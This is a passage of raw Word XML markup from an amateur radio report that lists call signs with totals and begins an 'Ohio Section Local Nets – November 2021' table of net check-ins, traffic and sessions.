              </w:rPr>
              <w:t>WB8SIQ-52</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="2CA50711" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F568226" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>K8MWF-23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04CBB696" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>KD8MSZ-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1628569C" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>N8MRS-83</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="248F6867" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>WB8YYS-24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="7161DBD4" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="520CF43C" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="339966"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="56029290" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3BBD8650" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70D68965" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>WB9LBI-78</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="062FBB04" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:trPr>
          <w:trHeight w:val="60"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="523B42D5" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="467FD818" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3191EE15" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46675B8B" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="45381F74" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="702641EC" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="339966"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1774" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="06BBE0CA" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> TOTALS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70AB6824" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> 37/1743</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1952" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AC72735" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="339966"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="FF0000"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="151B8115" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B33B13C" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OHIO SECTION LOCAL NETS – NOVEMBER 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692323E2" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="100" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1710"/>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="1140"/>
        <w:gridCol w:w="1311"/>
        <w:gridCol w:w="1457"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="5003BA9F" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1710" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0424942F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>NET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="990" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A5584F4" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>QNI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1070" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DDA28C2" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>QTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1140" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="055A6316" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>QTR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1311" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7797F6D7" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F5896">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:lang w:eastAsia="ar-SA"/>
              </w:rPr>
              <w:t>SESSIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1457" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1BE58A9F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
            <w:pPr>
              <w:suppressAutoHyphens/>
